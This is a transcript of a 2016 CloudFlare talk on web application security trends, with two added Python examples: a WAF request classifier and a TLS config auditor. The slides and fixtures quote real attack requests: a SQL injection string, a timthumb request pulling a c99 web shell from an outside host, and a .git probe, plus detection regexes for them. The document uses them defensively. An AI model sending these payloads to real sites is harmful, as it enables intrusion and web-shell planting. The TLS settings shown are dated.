Latest Trends in Web Application Security
Hear the talk on YouTube: https://www.youtube.com/watch?v=lp4dQTSH130

Web Application Firewall security is evolving. Join John Graham-Cumming, CTO of CloudFlare, as he shares the latest trends and changes in Web Application Security. This talk will give details of the big trends in web application security seen in 2015, and how to defend against these threats and talk about the evolving web application security landscape.
1. Web Application Security
John Graham-Cumming | Chief Technology Officer, CloudFlare
March 2016

2. Agenda
• Layered Web Application Security
• 2015 Top Web Application Attack Techniques
• Kitchen Sink Attacks
• TLS

3. Introduction

4. Our mission
Help build a better Internet

5. Running applications on the Internet is challenging
Standards/Platform, Availability, Security, Performance
“Hundreds of dollars a month for private hosting and it was still reliably crashing on or around decision day.”
“We're seeing some customers that are connecting to ixl.com via IPv6, which we are not equipped to handle.”
“The first flood of attack traffic was mitigated with some blocking techniques implemented by our CDN, but when the attack got more creative there was nothing more they could do.”
“Because our servers were only located in the U.S. at that time, some of our customers from other parts of the world were experiencing slower loading of the widget.”

6. We solve the challenges of the Internet
Standards/Platform:
• Analytics
• IPv6 gateway
• DNSSEC
• Google SPDY + HTTP2
• Apps platform
Availability:
• Load balancing
• Always online
• Redundant, Anycast network
Security:
• Reputation-based security
• Distributed denial of service (DDoS) mitigation
• Firewall
• Secure socket layer (SSL)
• Malware detection
Performance:
• Content delivery (CDN)
• Authoritative DNS
• Web content optimization (WCO)
• Front-end / mobile optimization
• Railgun™ WAN optimizer

7. (image-only slide)

8. Layered Web Application Security

9. What attackers attack
• Web applications themselves
  • e.g. attempted SQL injection
  • e.g. DoS by hitting CPU expensive URI
• Web servers
  • Attempted access to files on machines
  • SYN flooding to overwhelm TCP buffers
• Related infrastructure
  • Authoritative DNS for a domain / DNS poisoning
  • Domain registration

10. Layered Defense
• Secure Coding Practices
• Web Application Firewall
  • Can protect against application level attacks
  • Use one that can be customized for your application
• DoS mitigation service
• DNS service that has withstood large DoS attacks
• DNSSEC
• A domain registrar with robust security policies to prevent transfer

11. Buying Time
• A WAF buys time to patch vulnerabilities
• Common to see vulnerabilities announced along with patches
• But how long does it take to patch?

12. Examples
• December 14, 2015: CVE-2015-8562
  • Joomla CMS Unserialize Vulnerability
  • Released without a patch
• April 25, 2015: SUPEE-5344
  • Magento RCE Vulnerability
• April 15, 2015: CVE-2015-1635
  • Windows Server RCE Vulnerability

13. 2015 Top Web Application Attack Techniques

14. OWASP Top 10 in 2015
1. A5 Security Misconfiguration
2. A9 Using Components with Known Vulnerabilities
3. A6 Sensitive Data Exposure
4. A4 Insecure Direct Object References
5. A1 Injection
6. A3 XSS
7. A7 Missing Function Level Access Control
8. A8 Cross Site Request Forgery
9. A10 Unvalidated Redirects and Forwards
10. A2 Weak authentication and session management

15. Common Web DoS Vectors
• Requests without a user agent
  • Drop requests that have no User-Agent field
• WordPress pingback attacks
  • Drop WordPress pingbacks
• Fake user agent
  • Validate User-Agent to identify real browsers

16. Common Web DoS Vectors
• Faulty data sanitization
  /skin/interface/auth.php?&PASSWORD=1&USER_ID=%df'%20and%20(select%201%20from%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%232.
• Exploitation of timthumb for RCE
  GET /wp-content/themes/thumb.php?src=http://dsf2kh34as.co/c99.php

17. Common Web DoS Vectors
• Incorrect SCM data access
  GET /.git/HEAD HTTP/1.1
  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
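Slides 15 to 17 list request shapes a WAF should drop or flag. As an added example that is not part of the talk or of CloudFlare's code, the Python below labels constructed sample requests against those shapes; the rule names, the sample hosts and the pingback heuristic (an XML-RPC POST to /xmlrpc.php carrying a WordPress/ User-Agent) are my own assumptions, and the last sample shows why matching the bare keyword "select" would misfire.

```python
import re
from urllib.parse import unquote, urlsplit

# Constructed sample requests, not taken from the talk: (method, target, headers).
SAMPLE_REQUESTS = [
    ("GET", "/index.php", {}),                                   # no User-Agent at all
    ("POST", "/xmlrpc.php",
     {"User-Agent": "WordPress/4.4; http://blog.example"}),      # WordPress pingback
    ("GET", "/skin/interface/auth.php?&PASSWORD=1&USER_ID=%df'%20and%20"
            "(select%201%20from%20information_schema.tables)%23",
     {"User-Agent": "Mozilla/5.0"}),                             # SQL injection probe
    ("GET", "/wp-content/themes/thumb.php?src=http://cdn.example/c99.php",
     {"User-Agent": "Mozilla/5.0"}),                             # timthumb remote include
    ("GET", "/.git/HEAD",
     {"User-Agent": "Mozilla/4.0 (compatible; MSIE 8.0)"}),      # SCM data access
    ("GET", "/search?q=select%20a%20plan",
     {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64) Firefox/44.0"}),  # benign control
]

# Query-string patterns: a quote followed by a boolean operator, a SELECT ... FROM
# shape, or the schema catalog name; a bare "select" is deliberately not enough.
SQLI = re.compile(r"(?i)'\s*(and|or)\b|\bselect\b.*\bfrom\b|\binformation_schema\b")
REMOTE_SRC = re.compile(r"(?i)(^|&)src=https?://")   # src= pointing at another host
SCM_PATH = re.compile(r"/\.(git|svn|hg)(/|$)")        # repository metadata paths

def classify(method, target, headers):
    """Return the names of the rules that fire for one request ([] means pass)."""
    hits = []
    ua = headers.get("User-Agent", "")
    parts = urlsplit(target)
    path, query = parts.path, unquote(parts.query)   # decode once, then match
    if not ua:
        hits.append("missing-user-agent")
    # Heuristic only: a real pingback is an XML-RPC POST sent by another WordPress site.
    if method == "POST" and path == "/xmlrpc.php" and ua.startswith("WordPress/"):
        hits.append("wordpress-pingback")
    if SQLI.search(query):
        hits.append("sqli-probe")
    if path.endswith("thumb.php") and REMOTE_SRC.search(query):
        hits.append("timthumb-remote-include")
    if SCM_PATH.search(path):
        hits.append("scm-data-access")
    return hits

def scan(requests):
    """Label every request; a WAF would drop or challenge anything with hits."""
    return [classify(*req) for req in requests]

if __name__ == "__main__":
    for req, hits in zip(SAMPLE_REQUESTS, scan(SAMPLE_REQUESTS)):
        print(req[0], req[1][:40], hits or "ok")
```

Validating that a User-Agent belongs to a real browser (the third bullet on slide 15) needs a maintained signature list and is not attempted here.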
18. Kitchen Sink Attacks

19. Everything they’ve got
• Common to see attackers try multiple vectors to bring down a web site
  1. Simultaneous SYN flood, DNS reflection attack, and authoritative DNS attack
  2. Using multiple layer 7 (HTTP/HTTPS) botnets at the same time
  3. 1 and 2

20. Typical DoS volume at CloudFlare
(chart-only slide)

21. Recent 400 Gbps DoS attacks
(chart-only slide)

22. TLS

23. (image-only slide)

24. DROWN, March 1 2016
(image-only slide)

25. CloudFlare’s TLS Configuration
• Public and on Github: https://github.com/cloudflare/sslconfig
  ssl_protocols TLSv1 TLSv1.1 TLSv1.2;
  ssl_ciphers EECDH+CHACHA20:EECDH+CHACHA20-draft:EECDH+AES128:RSA+AES128:EECDH+AES256:RSA+AES256:EECDH+3DES:RSA+3DES:!MD5;
  ssl_prefer_server_ciphers on;

26. Conclusion

27. Conclusion
• Layered Defense
• Patch but use a WAF to buy time
• Stay on top of TLS
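Slide 25 shows the nginx TLS directives CloudFlare published, shortly after DROWN (slide 24). As an added example that is mine and not code from the cloudflare/sslconfig repository, the Python below parses ssl_* directives and flags the settings the talk's "stay on top of TLS" advice is about, running the slide's own config beside a constructed weak one; the finding names are my own.

```python
import re

# nginx TLS directives from slide 25 (rejoined across the slide's line breaks).
SLIDE_CONFIG = """
ssl_protocols TLSv1 TLSv1.1 TLSv1.2;
ssl_ciphers EECDH+CHACHA20:EECDH+CHACHA20-draft:EECDH+AES128:RSA+AES128:EECDH+AES256:RSA+AES256:EECDH+3DES:RSA+3DES:!MD5;
ssl_prefer_server_ciphers on;
"""

# Constructed weak configuration for contrast; not from the talk.
WEAK_CONFIG = """
ssl_protocols SSLv2 SSLv3 TLSv1;
ssl_ciphers HIGH:MEDIUM:RC4:MD5;
ssl_prefer_server_ciphers off;
"""

DIRECTIVE = re.compile(r"^\s*(ssl_\w+)\s+(.*?)\s*;\s*$", re.M)

def parse(config):
    """Map each ssl_* directive name to its argument string."""
    return dict(DIRECTIVE.findall(config))

def audit(config):
    """Return findings for the directives; an empty list means they pass these checks."""
    d = parse(config)
    findings = []
    protocols = d.get("ssl_protocols", "").split()
    for old in ("SSLv2", "SSLv3"):
        if old in protocols:
            # SSLv2 is the DROWN vector; note that any other host using the same
            # RSA key must refuse SSLv2 too, which a single config cannot prove.
            findings.append(f"{old} enabled")
    if "TLSv1.2" not in protocols:
        findings.append("TLSv1.2 not offered")
    ciphers = d.get("ssl_ciphers", "").split(":")
    if "!MD5" not in ciphers:
        findings.append("MD5 suites not excluded")
    if any("RC4" in c for c in ciphers):
        findings.append("RC4 suites listed")
    if d.get("ssl_prefer_server_ciphers") != "on":
        findings.append("server cipher preference off")
    return findings

if __name__ == "__main__":
    print("slide config:", audit(SLIDE_CONFIG) or "no findings")
    print("weak config: ", audit(WEAK_CONFIG))
```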